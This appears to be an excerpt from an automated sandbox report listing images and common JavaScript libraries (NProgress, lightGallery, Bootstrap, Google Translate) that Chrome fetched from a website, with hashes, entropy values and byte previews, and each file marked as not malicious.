                    Preview:.PNG........IHDR...0...0.....W.......IDATx..Uw.X...........b.....pb.Sfff.6....3o.wvF.(..r.u..9_|...Is%..D......Xz.c....;...y;.....&#.l......H...X..s..]}..5`aZ..D.m....uk.c..i.|.H... I#yB.7.0..._E.".h..Xt.....9.4.......0:y.....F.ua^.|.....K..G..b&2;.z."...B/l$..s3.@..G..Z..`...p..EUU.hni...aZZZT......."...H.Z.....H....<..g.......U.........f."../...Gg...$....<YTU.p.....ND"$^.5!..@.8....Nhj.f.]......"..B..i..,...oh.5.....F.L........;"C...bO...*.Qa.G..!.....4.._....l..N.].....g...PoD....1r{......X.1..!.....}.o....=..^6i.{.......9`i...\~...Dyy9..`..D...n>.....7:.....1...t.(.D.=>....DH.0...K.Mx....,....$..1.1.P.T.............@'..6...Kv..e...D.?.X...k.2..|l.$m&...K/.c......Vn....V ...`I......8al.zT.=..+Wr..%?.X.`..g....,..[...nc..:!..$.@2..3.|....sB...&..*.a.<..}).zX.Q.)5....X.1..bk.....Vn...C#.c......mx.=.[...,.r.G....OMS....e.06.#.+..8Fne......B!...%..,........W...*.F..x#.Vv....I..c(...x5..u.....`hP.......&>......8...D#Cg.v.{Hyb.v..8.K7X`.....|O.z.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1693
                    Entropy (8bit):7.7637669412840875
                    Encrypted:false
                    SSDEEP:24:qV4Pq59mpnjcJAXN9KOBuoovSzIv6IyDVo3++CbFobn5pLtOF9oQrMmPrewaVjjo:sCjc+9vgrvrGbCBO5reNVXYNh
                    MD5:E77E3FCB618DB9C2F182C5A8D56EF81D
                    SHA1:C42B198B83ED14663C6FB8E31F82239E6CA1F0F3
                    SHA-256:9599B6E6AA8992F53C3CE418C07C18CEB2535FD0F7F785166245D8E2ED46F4B3
                    SHA-512:C7CFD2EAEFAA5A47FB2B77430E9203621AF2CD02F88248AE94BC6BAE668A4746183EDCF278B45CB551B9D7EA901F55AC8D2204DF4B7299020E8AEDC8A9FDD532
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE.......................}}}www.........ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...4.N.....tRNS.@..f...rIDATH....WSW....@E....jM@L. .<H.E.(U.j.u...Z..P....G..m.n..u.Fj .`x.a......_.{.{/M0.".....|ONN...B.i........v".yZt..7.E..&..i._....|....j.J...|`....h.9GV.\.bt.n.f..q...-.9.V...fj....^1?>.....&...cg
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1724
                    Entropy (8bit):7.76828347703023
                    Encrypted:false
                    SSDEEP:24:Kls4mpnjcJAXN9KOBuoovSzIv6IOzBQErYeHRVaspP0+3cpT9VeADt2IhFZ:Kejc+9vgrveB9Haspt3cpTL3rZ
                    MD5:875A879394AB551FB693A7285CC2CAAB
                    SHA1:08046991ED14417EA19F8E1DD86F77F76FA1A04D
                    SHA-256:0AD94F487C69F50B650697576DA54A9E56F374915F209DE2F98416169E90AEFD
                    SHA-512:C72C21F4493262AC49B07337F87C8FBC08D9032BB99A4330092FDEE1F4CDAC2DD088DC8E21F168618BAD004A4B3F06EDF615415C96BDE2B273C6CA0F745A6A2D
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/13/1398.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE..........................................}}}zzz.............................www.....ttt..........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF....0......tRNS.@..f....IDATH...it.U....le... J[dI...m.3mD,. ..(........"..(... .#....--...*.%o:I&L..}.M*......$.....99.d.!....*RC....~....>..;.=w..G.......i.m{.7U.H...t`.H.<~..//q..(9T...>..'..}~C..#.\..?.m..A
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1692
                    Entropy (8bit):7.7866711327533125
                    Encrypted:false
                    SSDEEP:24:yLs4Pq59mpnjcJAXN9KOBuoovSzIv6ILxcZ3/Cgvpc+xVvKpVAfQdGCSFtdHsXTc:usCjc+9vgrvy+sv4qfQ8Bd8c
                    MD5:4DC8DCC5B21E31C390804369F2B24929
                    SHA1:BC488B251ABB5120A3B94602B2345E9222A12F30
                    SHA-256:8B68A0258EB964A2268E37A17F1175BF73ED0C26C070C1FDF24E9EA884FAD059
                    SHA-512:DDC7D6A4C2CCB13963EBDE879737A6854475B3FA98A5B7B5170911D614CAACDEAD2BB6D126DADFF161363C211131C6EFED84D4A8E71463F5B29AC07B86E73E61
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE................................ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF..........tRNS.@..f...wIDATH....w.U...P(..@.i.....f.Z.....;.........(...*(......{...L,-.X.&...?.....4%.b.9'.~.}s...I&C.!A../..j......xT.......%...t......p....T...[.'Ul{<A..D. u.(...9..y..D.6.6.i.5R}..../.........M..:..7......
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (1322)
                    Category:downloaded
                    Size (bytes):6333
                    Entropy (8bit):5.084154335209196
                    Encrypted:false
                    SSDEEP:96:ooK/10d1uNfq7eD0IAurkMDbYVsPrL6v/H8cE/xCJ2crMZ2VWOT2wfq5L8eBA61p:PK/10GVou4mdPn+H8jiIoVWOdG8euww+
                    MD5:50B9DAF8A63C696DFE33399FEB534B97
                    SHA1:5B7EAF927219B16AC852F3EBE53A79CC6F41F8A8
                    SHA-256:16B779196973D36875D360D9FA9870D57C5E105D830C173EF97085F3D0330548
                    SHA-512:386013DF601C069D6B21B7F63F0CA03E9E56DEDD392DD5A66740829CCACE7CF5611C93DC707E9EEA271E28F86AE5F7BA2D645EAF86A41D6D705C36CDEA558292
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/nprogress/nprogress.js
                    Preview:;(function(root,factory){if(typeof define==='function'&&define.amd){define(factory);}else if(typeof exports==='object'){module.exports=factory();}else{root.NProgress=factory();}})(this,function(){var NProgress={};NProgress.version='0.2.0';var Settings=NProgress.settings={minimum:0.08,easing:'ease',positionUsing:'',speed:200,trickle:true,trickleRate:0.02,trickleSpeed:800,showSpinner:true,barSelector:'[role="bar"]',spinnerSelector:'[role="spinner"]',parent:'body',template:'<div class="bar" role="bar"><div class="peg"></div></div><div class="spinner" role="spinner"><div class="spinner-icon"></div></div>'};NProgress.configure=function(options){var key,value;for(key in options){value=options[key];if(value!==undefined&&options.hasOwnProperty(key))Settings[key]=value;}.return this;};NProgress.status=null;NProgress.set=function(n){var started=NProgress.isStarted();n=clamp(n,Settings.minimum,1);NProgress.status=(n===1?null:n);var progress=NProgress.render(!started),bar=progress.querySelector(Se
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1695
                    Entropy (8bit):7.792791008858268
                    Encrypted:false
                    SSDEEP:24:NLs4Pq59mpnjcJAXN9KOBuoovSzIv6IWMq09Wzj5VyhMm5Bz2ycaLOQbEY6SXx:tsCjc+9vgrvXq09WzjiqmrncaZA4x
                    MD5:D181F2C1A30A3F45A613CBE7048947E3
                    SHA1:4C1DC4EC544E78278C1B1B25275BAF4A36A8EAA0
                    SHA-256:DA0DE6CDB7D4A04D877D470ABAF30F91448D140454523C0817FB5151DC09CA38
                    SHA-512:7B7EB1945F54047A23E35A021D9D33CAF3B1DC0074B5B5BA0A1306705DDCA93ABB3FA7B8B61C7CE8289A8F8B3EE2273F6427D5A954C4ED5B368F6579153D1F48
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE........................................ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...3.......tRNS.@..f...qIDATH....[[U...#.DQ(TD.(.....\H..).......=.n]m..[K........Br#C....&.....s...._$...}..=..>y..."....b..k....;..h...5k.n.5........h...*&.J..2..*....}.b..../F.Vc.....s>/X.v...j-.>..O....?....6#q...?.z..
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1703
                    Entropy (8bit):7.7912309701979545
                    Encrypted:false
                    SSDEEP:48:y38zjc+9vgrv0lz9ZRMkolAVJ9lJJBBUAhxGwT:kuw9vYzTRNVJL3DhIwT
                    MD5:4D5647E66CF72A64CB9E67DA057E5B0C
                    SHA1:59391F0638820E32B19378D655DA1A783F60BA31
                    SHA-256:C65426C62D207905D3433DD0A2777599B0160B7314E2E8DE588CE5DF56A460C2
                    SHA-512:7D15C193E5F76DEF62362EA282C687B918E5FDE49B82C4F77A464C4D7F95386CF6A766EED7427E4960605B61115F5688DFAD5A260D4C1EEC654D87405FCD3106
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE......}}}.......................zzz................................www.....ttt..........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...}.......tRNS.@..f...vIDATH....W.W...U(....[.`0.An..V$F...U[....kk]Z...j[..%..U.....@\*.V!.....&...?.o.A....%.s....3.99.d.B.a.k..:.`C)v .q\...:...E...0.M;..qy....H...zL.......i{j.z0*.7.1[.\&..!.#.4\A..f.....=o..<..5
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (5322), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):5466
                    Entropy (8bit):5.2301142241056215
                    Encrypted:false
                    SSDEEP:96:L1McUMEfGRE2fWsdES71rqx4Avssbo55vbC7LS1GbE2QNRUFa:L1McZ7ysdD715sbo5x2vcKZqUFa
                    MD5:CA93CC617EF635F69F697EA8D11FB4B4
                    SHA1:F283ED63C41E3B8E21DC701E256C0C471F8406D8
                    SHA-256:E89F886E562B55DF3A64A846599F083C02F0B1742C4FFCC2B9C89BE38D5BD5C6
                    SHA-512:9ED4316F958FC3C529F3A43A8B9ADD966FAFFCAB47EEF68C57AD69527CCD13E51AC9D8E5C4F6C832A0150F993A649E5E7C0B6338826434E6B5483298F560CDB4
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/lightgallery/dist/js/lg-video.min.js
                    Preview:/*! lightgallery - v1.2.21 - 2016-06-28..* http://sachinchoolur.github.io/lightGallery/..* Copyright (c) 2016 Sachin N; Licensed Apache 2.0 */..!function(a,b,c,d){"use strict";var e={videoMaxWidth:"855px",youtubePlayerParams:!1,vimeoPlayerParams:!1,dailymotionPlayerParams:!1,vkPlayerParams:!1,videojs:!1,videojsOptions:{}},f=function(b){return this.core=a(b).data("lightGallery"),this.$el=a(b),this.core.s=a.extend({},e,this.core.s),this.videoLoaded=!1,this.init(),this};f.prototype.init=function(){var b=this;b.core.$el.on("hasVideo.lg.tm",function(a,c,d,e){if(b.core.$slide.eq(c).find(".lg-video").append(b.loadVideo(d,"lg-object",!0,c,e)),e)if(b.core.s.videojs)try{videojs(b.core.$slide.eq(c).find(".lg-html5").get(0),b.core.s.videojsOptions,function(){b.videoLoaded||this.play()})}catch(f){console.error("Make sure you have included videojs")}else b.core.$slide.eq(c).find(".lg-html5").get(0).play()}),b.core.$el.on("onAferAppendSlide.lg.tm",function(a,c){b.core.$slide.eq(c).find(".lg-video").c
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1652
                    Entropy (8bit):7.7505351705166525
                    Encrypted:false
                    SSDEEP:24:nV4Pq59mpnjcJAXN9KOBuoovSzIv6INOHkasxK+G+87ome9bIBbRpv7:VCjc+9vgrvMH0xK+GSmedIBvv7
                    MD5:FC582BA2D77271C25054900D467B0A82
                    SHA1:A6CB08EF0BEE8116EE6EB0245A0B364BD4BE925F
                    SHA-256:39D8071186F5B2A2065D43D0A565BA5AAF2B869D47F8617AB58E19D01EA9803F
                    SHA-512:EE84C61C097699BADB0BCE1F8FC00B785D53B14337CBC23D1D282B877AA761B4DB9168DC203CACC6B6B9648D39B9B79B1B948A17C5AE781C00E1DCCFFAA36E95
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE.................}}}www.........ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...eZ......tRNS.@..f...OIDATH....w.U....".P(*e.Z......6 .B.QQ.w@..e_d.AY.T.E.ZqA.me+..n.,mCKK:.....d23a.?...$9.4.B.9'....9...I&..B......^G..b.b..r.0.....-l..b/O?3....V.4...[}.p1....@qcZ...0*.[..._%&.Lo...k...J}......Y..d...B..u.8..BV-~
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (2299)
                    Category:downloaded
                    Size (bytes):211432
                    Entropy (8bit):5.569724490647732
                    Encrypted:false
                    SSDEEP:3072:DrRjnNrtTjSFucbzErkIhOCVYJiQKNs0euKm4IYBsRszVF9AuRS42C:xJd2gcbgrxYJoSe0byuRS42C
                    MD5:1667228321EBB5757F510E81DA973A38
                    SHA1:B3C9D9CAF2C121BFA1783E0501738D59EC051D75
                    SHA-256:C16C6F2D4164C9297EDBC4E2693996B7890631977BACF14041F13F35F54AB44C
                    SHA-512:46D49930E13B36A7C72AD001858E1D69297138357AE25370A31BADE254B5373669C1392546D10E5C88264AF9B242F7CC7F22A8DFBB7BF81266C3AED5CEBC851F
                    Malicious:false
                    Reputation:low
                    URL:https://translate.googleapis.com/_/translate_http/_/js/k=translate_http.tr.en_US.CN92UFGTefQ.O/am=ABA/d=1/exm=el_conf/ed=1/rs=AN8SPfpMZl4qUsxgfOPcMKwgZzxQ1IBI9g/m=el_main
                    Preview:"use strict";this.default_tr=this.default_tr||{};(function(_){var window=this;.try{.var Lh,Mh,Nh,Vh,fi,gi,hi,ii,mi,Rh;Lh=function(a){return _.Da?_.Ea?_.Ea.brands.some(function(b){return(b=b.brand)&&-1!=b.indexOf(a)}):!1:!1};Mh=function(){return _.u("Firefox")||_.u("FxiOS")};Nh=function(){return _.Fa()?Lh("Chromium"):(_.u("Chrome")||_.u("CriOS"))&&!(_.Fa()?0:_.u("Edge"))||_.u("Silk")};._.Oh=function(){return _.u("Safari")&&!(Nh()||(_.Fa()?0:_.u("Coast"))||_.Ga()||(_.Fa()?0:_.u("Edge"))||(_.Fa()?Lh("Microsoft Edge"):_.u("Edg/"))||(_.Fa()?Lh("Opera"):_.u("OPR"))||Mh()||_.u("Silk")||_.u("Android"))};_.Ph=function(){return _.u("Android")&&!(Nh()||Mh()||_.Ga()||_.u("Silk"))};_.Qh=function(a){if(a instanceof _.Lc)return a.g;throw Error("A");};_.Sh=function(a){if(Rh.test(a))return a};_.Th=function(a){return a instanceof _.Lc?_.Qh(a):_.Sh(a)};_.Uh=function(a){return Array.prototype.slice.call(a)};.Vh=function(a){return"function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():a};_.Xh=funct
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (32003), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):36874
                    Entropy (8bit):5.177719650022356
                    Encrypted:false
                    SSDEEP:768:9UfYD27UwlNHMl9lqNuCPNjhqg8epm5CCJFXfl/8Gf3ZTbQ:m/76whqKGvl33ZXQ
                    MD5:FB0E635DB142B1B9FCE20FE2370EC6CC
                    SHA1:C5C481CA5A263031D938F6C12ABD2FE5FB4B6A83
                    SHA-256:5A4A5359110A773BD154DA94C48FFD6A6233A29DFD5A9314555F5AE6C3E47459
                    SHA-512:DDCFF973930485FEAEF0476731CAF0D210E4E9BE47C6271FE5A9175A885F27509558B1EF1BE42E791E0398D7D109BAD33C3A912B11653C3290825BC0C7871411
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/bootstrap/js/bootstrap.min.js
                    Preview:/*!.. * Bootstrap v3.3.6 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under the MIT license.. */..if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>2)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 3")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.e
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):1842
                    Entropy (8bit):7.844880044441599
                    Encrypted:false
                    SSDEEP:48:CpBmStVyR9tjRq82OyNFQVYhMyTkRJO05Z:OuRP9q82OyNFQVY3CJOaZ
                    MD5:C69C796362406F9E11C7F4BF5BB628DA
                    SHA1:E489CE95AB56208090868882113D7416ABF46775
                    SHA-256:4DAC0026FBFA2615DCE30C0AF12830863FE885F84387A0147B9E338F548D5D82
                    SHA-512:D3AD560ED0FD29BE7D2CC434694F09E5A6FBEA8B29C0611AECB54A1B73B4D722C53F42A19DAE9E3D5D358444E50FB8FFFBC39D67CE751BDBC8C861F6F95D3162
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...0...0.....W.......IDATx..Uw.X...........b.....pb.Sfff.6....3o.wvF.(..r.u..9_|...Is%..D......Xz.c....;...y;.....&#.l......H...X..s..]}..5`aZ..D.m....uk.c..i.|.H... I#yB.7.0..._E.".h..Xt.....9.4.......0:y.....F.ua^.|.....K..G..b&2;.z."...B/l$..s3.@..G..Z..`...p..EUU.hni...aZZZT......."...H.Z.....H....<..g.......U.........f."../...Gg...$....<YTU.p.....ND"$^.5!..@.8....Nhj.f.]......"..B..i..,...oh.5.....F.L........;"C...bO...*.Qa.G..!.....4.._....l..N.].....g...PoD....1r{......X.1..!.....}.o....=..^6i.{.......9`i...\~...Dyy9..`..D...n>.....7:.....1...t.(.D.=>....DH.0...K.Mx....,....$..1.1.P.T.............@'..6...Kv..e...D.?.X...k.2..|l.$m&...K/.c......Vn....V ...`I......8al.zT.=..+Wr..%?.X.`..g....,..[...nc..:!..$.@2..3.|....sB...&..*.a.<..}).zX.Q.)5....X.1..bk.....Vn...C#.c......mx.=.[...,.r.G....OMS....e.06.#.+..8Fne......B!...%..,........W...*.F..x#.Vv....I..c(...x5..u.....`hP.......&>......8...D#Cg.v.{Hyb.v..8.K7X`.....|O.z.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1627
                    Entropy (8bit):7.744014189054335
                    Encrypted:false
                    SSDEEP:24:als4mpnjcJAXN9KOBuoovSzIv6IWyWTdEcVSFGqgmwYD6jttTLTk/N:aejc+9vgrvu+6SqYF
                    MD5:B14C0D08CF145C95FD817B8D9185405B
                    SHA1:F6FDA65E743877C776ED034A59646A5B2A7505BF
                    SHA-256:865AE91C010CF38B020C3798CD0DF5B9C5E17C45DF45E22EDE99B44A5EE82581
                    SHA-512:D72DBA0198E3490CAC46B06AF8C65D73BD6AA708F06F78331213363D8E80BA54C2E79592E1524F56EC01D7CCA6DDACAE5ECC77C66334DDFBB09F20E877941387
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE...........................}}}zzz.............................www.....ttt..........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF......@....tRNS.@..f...0IDATH....S.A...7D..T...r.Q.....{...{....b..* %. I.......b._.^IL...|f...7on2...BH#.U.$.u[..k.G.Q.....==M.......(....c..H."7;.]$.....Z..>o..%...9..~&.\./.7..T...:q.......g..(IFL...x.b>.....e..ys.I......
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1493
                    Entropy (8bit):7.709069389387904
                    Encrypted:false
                    SSDEEP:24:hIiT2QQnjcJAXN9KOBuoovSzIv6IfiMvXqjbh6mPycxBR6dezUNEGpFOw+oDWP0S:OA2vjc+9vgrvZvXpAqmuEGDOw+W80Gv
                    MD5:8A4DDADF07EF74FFCF378490E63C1252
                    SHA1:A1EFA34E97FCCD02F0E7B366561A15CD4FE14E98
                    SHA-256:543BC3E40C4BACB439A883A01F124339341CF8F1EF0BE84E06745BD28A798B5F
                    SHA-512:EA3D7865511A8F70B9E6655916C85E444EE977FB5C7DAA9EAA064BE4194F6147AEE3357A2BD2CCA7FDD54D0B18DEE9BE1BBE17C658C4EEA3B77E11FDC0653B52
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE...............................rrr...........................ppp...........}}}zzzwww.........ttt............\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF..........tRNS.@..f....IDATH....S.A...U.+.T.P"..AD.....{.w............!1$* d.K#..p...1....3.}.}..&.....h"..."W}..E......X..Pk.Hf........!.8V.Gjd...."..i..LE......%%...b..I\.SW..YR..7.m>......u6.......}+......{...|x.H.<..M..j].....J....\.p.@ ..)@@..N=
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text
                    Category:downloaded
                    Size (bytes):8732
                    Entropy (8bit):5.39222396905983
                    Encrypted:false
                    SSDEEP:192:pNa5N4NXNO3qNWNIXNENFQNDN8NW3XNtNGqN+rNU7N8NHNs3sNWNiNNDNn1NhN6z:vafWdMQcMCFe5KkdjjmUBKtaacM5n734
                    MD5:9901D8E86EB3CC0B0EA24D6939D67A3A
                    SHA1:235A544A3F9024C6A123CC71D679097D2D7E1C80
                    SHA-256:D3F4104957E76483ACBA4180738253208FD8D4D81C64931244860514AF502B82
